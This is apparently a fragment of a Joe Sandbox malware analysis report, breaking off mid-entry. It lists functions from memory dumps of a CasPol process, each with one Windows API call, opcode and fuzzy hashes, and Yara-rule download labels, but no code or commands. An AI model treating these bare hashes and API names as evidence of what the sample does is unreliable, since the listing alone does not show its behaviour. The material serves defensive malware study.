                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 433d66aca03a94927a253a31e3e356adf19df545bc79c224e24eb4ad01433980
                                                                                      • Instruction ID: a97df9758226023eaffacde8ac16843e94568aca3af6b586a5902f66841c558e
                                                                                      • Opcode Fuzzy Hash: 433d66aca03a94927a253a31e3e356adf19df545bc79c224e24eb4ad01433980
                                                                                      • Instruction Fuzzy Hash: 45414DB4900249DFCB10CF95C484AAAFBF5FF88324F19C959D519AB321D775A841CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 017642C8 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017642B1,00000800), ref: 01764392
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 0171f612f9f3519e0dff3a84bac272fb9ad3726c01dac016e960727313ab7e6f
                                                                                      • Instruction ID: 7de65eccce84e211eab3705f8b7d783d67205d8d44158a88ed6f44d402400667
                                                                                      • Opcode Fuzzy Hash: 0171f612f9f3519e0dff3a84bac272fb9ad3726c01dac016e960727313ab7e6f
                                                                                      • Instruction Fuzzy Hash: 3931EDB19043898FDB11CFAAC804ADAFBF4EF85314F14846AD949E7242D3799805CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0151C1F8 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0151C2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: 203f831b82f0c9ececc430f9a95ef36e59977e73b3685e8de2a3d9d2ab5dbb47
                                                                                      • Instruction ID: 60c8c32a05d991ff3a4e72f784802786c7af10a78b7009031d25fd99f5fe1e77
                                                                                      • Opcode Fuzzy Hash: 203f831b82f0c9ececc430f9a95ef36e59977e73b3685e8de2a3d9d2ab5dbb47
                                                                                      • Instruction Fuzzy Hash: 5541FCB1D002589FDB11CFE9C884ADEBFF5BF48310F14802AE858AB314D7319905CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01518310 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0151C2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: 72ac4586fbbf11ad0e042a4f32acfbb4043a08da7a0145cef7be2f940a513f15
                                                                                      • Instruction ID: 49a7b8beaa222a227c6e74f37ebadf074109d344d249c4aaf72e302a8bf4bc3c
                                                                                      • Opcode Fuzzy Hash: 72ac4586fbbf11ad0e042a4f32acfbb4043a08da7a0145cef7be2f940a513f15
                                                                                      • Instruction Fuzzy Hash: 7731E0B5D002589FDB10CFDAC984ADEBBF5BF48710F15802AE858AB314D775A905CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01518304 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0151C04C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 6cca24c8354b4caaef6152032731176dfee95758b9e89a4471e0ae70d4adcb0a
                                                                                      • Instruction ID: 17540b54d8ef8083cab220d1f03d91a9f8423c4495a0955ab399dcbb43477c87
                                                                                      • Opcode Fuzzy Hash: 6cca24c8354b4caaef6152032731176dfee95758b9e89a4471e0ae70d4adcb0a
                                                                                      • Instruction Fuzzy Hash: AF3101B0D042498FDB10CF99C588A8EFFF5BF49304F24816EE908AB345C7B69844CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 015183EF Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: cdc9b1b16649e6b1eab238f4b0ded1ebecc8254dd785421f8e5f4fb676b6c2a6
                                                                                      • Instruction ID: e6c8cfb5944ad0988e1d6e31c6ff9be640789f46d6843b840a28fa4f272713fe
                                                                                      • Opcode Fuzzy Hash: cdc9b1b16649e6b1eab238f4b0ded1ebecc8254dd785421f8e5f4fb676b6c2a6
                                                                                      • Instruction Fuzzy Hash: D521ED709103099FEB25CF64D489AEDBBB2FF46355F10892CE405AB255CB359842CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7AA54A Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 1a670a98a5c69717b7072051a326a4f90ff6852dd6ee1b3e6c523cfd9a770014
                                                                                      • Instruction ID: dc73ad66831330d4ab5ba1820d31ee8c4a268764e53910eaeb289b6d99a2eda7
                                                                                      • Opcode Fuzzy Hash: 1a670a98a5c69717b7072051a326a4f90ff6852dd6ee1b3e6c523cfd9a770014
                                                                                      • Instruction Fuzzy Hash: 552103B59002089FDB10CFAAD884ADEBBF8EF48320F14801AE914A7211C378A940CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7AA550 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: fd5ca80bfae1fd819ad10d2709f89c6cb3ea33278e406823b4bc90447ca1ef20
                                                                                      • Instruction ID: df81323d4547d4a26751d0916a9abe94cc6c308a31e651241c9364ba28cf4070
                                                                                      • Opcode Fuzzy Hash: fd5ca80bfae1fd819ad10d2709f89c6cb3ea33278e406823b4bc90447ca1ef20
                                                                                      • Instruction Fuzzy Hash: 1A21E3B59002489FDB10CFAAD984ADEBBF4EF48720F14841AE954A7251D374A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01761078 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      • Opcode ID: 2c356fc4509b6b76a24512a9e4ec7fc36a32e90821fee0568fc733f81e9c5880
                                                                                      • Instruction ID: c29310a7c279a08e668c1b691cea2cfa542d1acb748ae3fa5eab97147a351ebd
                                                                                      • Opcode Fuzzy Hash: 2c356fc4509b6b76a24512a9e4ec7fc36a32e90821fee0568fc733f81e9c5880
                                                                                      • Instruction Fuzzy Hash: 442130B5D002498FDB10CF9AD888ADEFBF4FF89214F14852ED819B7600C375A509CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01762C68 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017642B1,00000800), ref: 01764392
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: e6fce8266b47a89da211663fbed0fa4548e9e92718ea1ac1b3f5106ea66840f6
                                                                                      • Instruction ID: 4154cd0bd3062835f0799a55aa0697a595ea1d1694953b3e883837a7e4966c77
                                                                                      • Opcode Fuzzy Hash: e6fce8266b47a89da211663fbed0fa4548e9e92718ea1ac1b3f5106ea66840f6
                                                                                      • Instruction Fuzzy Hash: 611144B6C043488FDB10CF9AC844A9EFBF8EF89310F01842AD959B7200C379A944CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 017676B0 Relevance: 1.6, APIs: 1, Instructions: 55comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 4babd8b3cc25874a4185f3ae42726b0e974fdbec1fae25cae48d1b6add25c16e
                                                                                      • Instruction ID: 02d98ded72fdae4fbdf65f68016563a25c51f4bcaa5bcc81eb9c803f9270b2bd
                                                                                      • Opcode Fuzzy Hash: 4babd8b3cc25874a4185f3ae42726b0e974fdbec1fae25cae48d1b6add25c16e
                                                                                      • Instruction Fuzzy Hash: 951179B58043488FCB10DFAAD448BDEFBF8EF59324F10445AD558A7241D374A544CFA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01761080 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      • Opcode ID: f3ce9e67c67047e4c01a3795625b4165821b23bb38ed38319a57d80e018ee366
                                                                                      • Instruction ID: a57cd4ba133a2e7edfc3e235976b1afa87ca9c282f1c6fc69be39568e252c745
                                                                                      • Opcode Fuzzy Hash: f3ce9e67c67047e4c01a3795625b4165821b23bb38ed38319a57d80e018ee366
                                                                                      • Instruction Fuzzy Hash: FC11EEB5D002498FDB14CF9AC888ADEFBF8FF89214F54852ED919B7600C775A544CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7A37C8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 61a88e0d1cdb1f4b75c95368a5548bd04546db61c0c9b1bc63be10dc3ce7a069
                                                                                      • Instruction ID: fd674f7c1b3b4608304d7c462116f384a4b548257e20595574bdfe79fa10802f
                                                                                      • Opcode Fuzzy Hash: 61a88e0d1cdb1f4b75c95368a5548bd04546db61c0c9b1bc63be10dc3ce7a069
                                                                                      • Instruction Fuzzy Hash: 741120B5C003098FCB10CF9AC444B9EFBF4AF88224F05851AD829B7200C3B9A505CFA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7A5349 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 09d40a13cce38fba311e70fdf4500b13953af3eb944e87f8b4dd6b98d43aad27
                                                                                      • Instruction ID: 22551d06a956ae445f97dea6c0f0b812f4d6c9d8161cdb73a688352e393be783
                                                                                      • Opcode Fuzzy Hash: 09d40a13cce38fba311e70fdf4500b13953af3eb944e87f8b4dd6b98d43aad27
                                                                                      • Instruction Fuzzy Hash: 9D1120B5C002498FCB10CF9AC444BDEFBF4AF89224F15841AD429B7200C3B9A545CFA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 017676C4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: b1edaa7c879c4e322719f5aff168c9b1641b49d0eb4e358b29011342d54fa47a
                                                                                      • Instruction ID: 5efb0ce3637633acecd158da4eba58394ca5a7414290f1fc17cb2f37438d3820
                                                                                      • Opcode Fuzzy Hash: b1edaa7c879c4e322719f5aff168c9b1641b49d0eb4e358b29011342d54fa47a
                                                                                      • Instruction Fuzzy Hash: A51115B59043488FCB10DF99D548B9EFBF8EF58324F148459DA58A7301C379A944CFA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7A5321 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: f919a077ef5a6a3ec2c8811f32128aae95aa140839cfe56093d8cf297c7d3013
                                                                                      • Instruction ID: c531eaea94da3a6af2a942276ea979d606bf2e74770ff62cc418004257ce0e35
                                                                                      • Opcode Fuzzy Hash: f919a077ef5a6a3ec2c8811f32128aae95aa140839cfe56093d8cf297c7d3013
                                                                                      • Instruction Fuzzy Hash: 1A11E8B58043498EDB14CF9AD4047DEFBF0AF89328F1485AEC559AB612C376A146CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01761129 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      • Opcode ID: e6ddf8a2a65340c80b5effd60aefd108944163eb6fe620d2485113d39d76ae5d
                                                                                      • Instruction ID: 27537e5ae6b79477f51d5036583cf862b55ec65d9cd079e887fc23f8937ce0b9
                                                                                      • Opcode Fuzzy Hash: e6ddf8a2a65340c80b5effd60aefd108944163eb6fe620d2485113d39d76ae5d
                                                                                      • Instruction Fuzzy Hash: 5001D872D047848BDB119F5DD8083CAFBB0EF86324F25825BD55CB7251D7395484C761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01274EB0 Relevance: .4, Instructions: 446COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f65336bef736f5657d77cad237350852f31878973dc7894399614fc7e59283a
                                                                                      • Instruction ID: 2a0fb626e9040b367b2a598e65618ef0d50a3d6548a2ff3be1ca4037844c63c7
                                                                                      • Opcode Fuzzy Hash: 3f65336bef736f5657d77cad237350852f31878973dc7894399614fc7e59283a
                                                                                      • Instruction Fuzzy Hash: FBF1F134B142058FDB15CBB8C8846AEBBF2EF89315F148469E60ADB3A1DB35DC42CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0127F428 Relevance: .2, Instructions: 239COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 348e1941bf8182a996773ee691c18cda1451550affa9c638cb40b32043a3da82
                                                                                      • Instruction ID: 6936e633ce2e926a863b434f3909e097b9dd2f1cd3c0ffe16be8da10212c8c1c
                                                                                      • Opcode Fuzzy Hash: 348e1941bf8182a996773ee691c18cda1451550affa9c638cb40b32043a3da82
                                                                                      • Instruction Fuzzy Hash: F581D0307141169FCB15DF68C995BBF77A2EB88350F048429E62ADB290CF75DD41CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0127F7A0 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77d593a7c6a7951d137cc4c247f542f9bcea556c079b0ce59d02b30ae009bff0
                                                                                      • Instruction ID: 03cc5b3e96091e057f7630352db72e030d6e8aaeb929bdc1b68ea97539813018
                                                                                      • Opcode Fuzzy Hash: 77d593a7c6a7951d137cc4c247f542f9bcea556c079b0ce59d02b30ae009bff0
                                                                                      • Instruction Fuzzy Hash: 8D713A34728216CFDB15DF2CC994ABE7BE5AF89210B1900A5EA21CB371DB71DC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0127FAC0 Relevance: .2, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1f02b3f9e410789ffe981a9ef5a47f0cd643a5a01c536b5be74fc459f438773
                                                                                      • Instruction ID: 3282eacd34a564c72e34321699dece32b66aa33a1821190c1a106343301dc97f
                                                                                      • Opcode Fuzzy Hash: f1f02b3f9e410789ffe981a9ef5a47f0cd643a5a01c536b5be74fc459f438773
                                                                                      • Instruction Fuzzy Hash: 43516775A1825ADFCF05CFE8C9549EEBBB2BF8C310F10811AE921AB350E7749995CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01276CA9 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1320016e9e532d9898ddf2d3af53a10ccc736450828f10759df9bbcc4ee76272
                                                                                      • Instruction ID: 69caebaecc716f74580f8a2fa095a61d2795699dbd1813dce73540d8327184a5
                                                                                      • Opcode Fuzzy Hash: 1320016e9e532d9898ddf2d3af53a10ccc736450828f10759df9bbcc4ee76272
                                                                                      • Instruction Fuzzy Hash: A031F230B102158FEB189F78C4586AFBBB6AFC8244B10852DD516DB351DF34DC45CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012789F7 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f84ae4dfa139690775982dccd17c2fd110dc4ccd4e88a64e66393f274eb79eb
                                                                                      • Instruction ID: 7a3c7cb9442fd18e23e5131e3134392d18ecaa5ffbf4aece81a4a02ee302b952
                                                                                      • Opcode Fuzzy Hash: 7f84ae4dfa139690775982dccd17c2fd110dc4ccd4e88a64e66393f274eb79eb
                                                                                      • Instruction Fuzzy Hash: C831A275A0020A8BDB05CF69D8843A9F7B1FF84314F15C1AADA09DF256E775D845CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D67D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950352117.000000001D67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D67D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d67d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbe3e02eddebba915876e1af5c49779bf9e83a02896ea0dd884a0babcb7ef5bf
                                                                                      • Instruction ID: 9b3d4965d4d37509a21a5440ba30ab8eb6a01bb9359d6fd38e618285f45f7917
                                                                                      • Opcode Fuzzy Hash: fbe3e02eddebba915876e1af5c49779bf9e83a02896ea0dd884a0babcb7ef5bf
                                                                                      • Instruction Fuzzy Hash: DE21D8B2604248DFDB01DF14D9C0B1ABB65FBAC724F24C969D9094B24AC336E455CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01278B23 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8adecd8b2d3b2bdec520821fded1649b12bab577386e706304e143a78348e1f7
                                                                                      • Instruction ID: 85239b5b9214058e3cf04f3dc00b82e4eac17867ee1062c2875987b4482649d3
                                                                                      • Opcode Fuzzy Hash: 8adecd8b2d3b2bdec520821fded1649b12bab577386e706304e143a78348e1f7
                                                                                      • Instruction Fuzzy Hash: 10218471B241158FDB04DB69C81DBBE7BF6BF88650F158169E505EB3A0EBB19C008791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01278B30 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a54fbc63050ff2a4dd074ca077e8eb01e61d5892d4c04faeb2a7322e2c583e1
                                                                                      • Instruction ID: e5a11110e73b91f56d4d078fdf6f266a60cbe1ade8732990654c2c83725dc760
                                                                                      • Opcode Fuzzy Hash: 3a54fbc63050ff2a4dd074ca077e8eb01e61d5892d4c04faeb2a7322e2c583e1
                                                                                      • Instruction Fuzzy Hash: 3D21F271B241158FDB14CB78C81DB7F7AE6BF88660F248169E605EB3E0EB719C008791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D68D01C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950481715.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
